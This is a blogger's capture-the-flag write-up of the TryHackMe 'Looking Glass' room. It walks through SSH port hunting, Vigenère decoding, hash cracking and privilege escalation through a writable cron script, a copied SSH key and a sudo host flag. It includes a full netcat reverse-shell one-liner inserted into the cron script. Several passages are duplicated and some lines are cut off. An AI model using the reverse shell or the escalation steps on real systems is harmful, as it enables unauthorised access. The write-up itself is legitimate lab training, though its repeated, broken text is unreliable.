LOOKING GLASS Write-up | TryHackMe | by Valerie23
LOOKING GLASS:https://tryhackme.com/room/lookingglass
NMAP
Starting with a simple nmap scan to see which ports are open and what services are running on these ports.
Nmap scan results in a long list of open ports ranging from 9000 to 13783. And the ssh service is running on all these ports so lets try connecting to one of the Dropbear ports (for username - you can use any random name).
When we try connecting to port 9000 it tells us to go "lower" which we cannot do since 9000 is the lowermost open port (apart from 22). And when we try connecting to the uppermost open port 13783 , it tell us to go higher which is again impossible.
ssh toii@10.10.128.154 -o StrictHostKeyChecking=no -p 12373
We have finally found our real port 12373
But has given us an encoded piece of text and is asking for a secret.
Lets try to decode the text. At first glance it looks somewhat like ROT13. But this is actually "Vignere Cipher". To decode a Vignere Cipher we usually need a key. Thanks to this website that automatically detects the possible keys:
https://www.boxentriq.com/code-breaking/vigenere-cipher
Copy the cipher in the output message and paste it on the website it will give you the key and probably half of the decoded text. Try decoding the cipher again (this time with the key) to get the secret.
The last line of the cipher contains the secret:
Your secret is : bewar**********wock
SSH
Enter the secret to receive SSH credentials.
Now we can connect to the ssh and gain the user flag.
So now we visit tryhackme again and take the hint given in user flag which says "A looking glass is a mirror" .
So the output messages are mirrored. When it prints "LOWER" we actually need to go higher and vice-versa.
So lets try to find the real port while shrinking the range
So the output messages are mirrored. When it prints "LOWER" we actually need to go higher and vice-versa.
So lets try to find the real port while shrinking the range
We have finally found our real port 12373
NOTE: Remember that this port won't be the same for you and you will need to find your own port since this port changes everytime.
Lets try to decode the text. At first glance it looks somewhat like ROT13. But this is actually "Vignere Cipher". To decode a Vignere Cipher we usually need a key. Thanks to this website that automatically detects the possible keys:
https://www.boxentriq.com/code-breaking/vigenere-cipher
Copy the cipher in the output message and paste it on the website it will give you the key and probably half of the decoded text. Try decoding the cipher again (this time with the key) to get the secret.
The last line of the cipher contains the secret:
Your secret is : bewar**********wock
SSH
Enter the secret to receive SSH credentials.
NOTE: These credentials will change everytime. So you will have to find your own as these will not work for you.
We will find a mirrored user flag. To receive the original flag use the command:
echo <flag> | rev
PRIVILEGE ESCALATION
USER 1Using sudo -l
Lets look at the crontab now.
Lets see if we have permissions to alter the contents of twasBrilling.sh
And the answer is yes, so now we can put reverse shell inside it.
We can take help of this website for
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
We used
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
In tweedledum's home directory we can see a file named humptydumpty.txt.
It contains a hash , lets try and crack it on
crackstation.net
looks like the last hash is the password for user humptydumpty
So we copied the hash and pasted it on http://icyberchef.com/ to try and decode it. Finally we cracked it by converting it from hex. Then with the cracked password we escalated our privileges to root.
It contains a hash , lets try and crack it on
crackstation.net
looks like the last hash is the password for user humptydumpty
So we copied the hash and pasted it on http://icyberchef.com/ to try and decode it. Finally we cracked it by converting it from hex. Then with the cracked password we escalated our privileges to root.
su humptydumpty
USER 2
There is a file named "poetry.txt" in humptydumpty's home directory.But unfortunately there is no clue in it.
Lets visit other user's directory. Alice's directory contains ssh key, we can use this to connect to alice's ssh account.
So lets copy this file into our system and change its permissions using chmod 600 filename
then connect using the command:
ssh -i alicekey alice@10.10.170.193
So we try viewing tweedledee's directory sadly we don't have permissions to do so.
And we cannot run sudo -l since we don't have alice's password>
So we can try viewing sudoers file instead.
ssh -i alicekey alice@10.10.170.193
USER 3
Alice's directory contains a kitten.txt file but again there is no hint inside it for furthur escalation.So we try viewing tweedledee's directory sadly we don't have permissions to do so.
And we cannot run sudo -l since we don't have alice's password>
So we can try viewing sudoers file instead.
Here we can run /bin/bash as root using ssalg-gnikool as host .
s use sudo --help to find the flag used for specifying host,
we get to know that -h about -h flag, lets make use of it.
s use sudo --help to find the flag used for specifying host,
we get to know that -h about -h flag, lets make use of it.
ROOT
I have tried to include a lot of details to make it possible for even the beginners to complete the room while learning new things.
Comments
Post a Comment